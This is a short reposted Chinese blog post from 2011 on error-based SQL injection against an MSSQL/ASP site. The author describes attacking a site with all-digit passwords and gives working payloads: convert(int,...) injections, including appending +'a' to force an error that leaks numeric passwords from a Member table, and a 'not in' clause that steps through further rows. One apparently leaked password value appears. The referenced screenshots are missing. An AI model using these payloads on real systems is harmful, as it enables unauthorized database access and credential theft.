当前位置: 代码迷 >> SQL >> MSSQL显错流入爆数字型数据的一点思考
  详细解决方案

MSSQL显错流入爆数字型数据的一点思考

热度:68   发布时间:2016-05-05 10:43:29.0
MSSQL显错注入爆数字型数据的一点思考

Title:MSSQL显错注入爆数字型数据的一点思考 --2011-02-22 15:23

MSSQL+ASP

最近在弄个站点,密码是纯数字的,convert(int,())转换出来不报错,也不知道其他人用的什么函数或者类型来爆密码像"11111111"的这样的数据的,就自己想了下弄了个暂时可以用的方法.

数据库查询如图:

图一:

图二:


图三:

图四:



图五:


下面是实验

表Member 字段Password

语句

' or 1=convert(int,(select top 1 password from Member))--

语句'  or 1=convert(int,(select top 1 password from member)+'a')--

 

 


然后查询下一条数据

语句'  or 1=convert(int,(select top 1 password from member where password not in ('117517450'))+'a')--





不知道其他人是怎么爆的,可以告诉我的话,留个言,谢谢。

  相关解决方案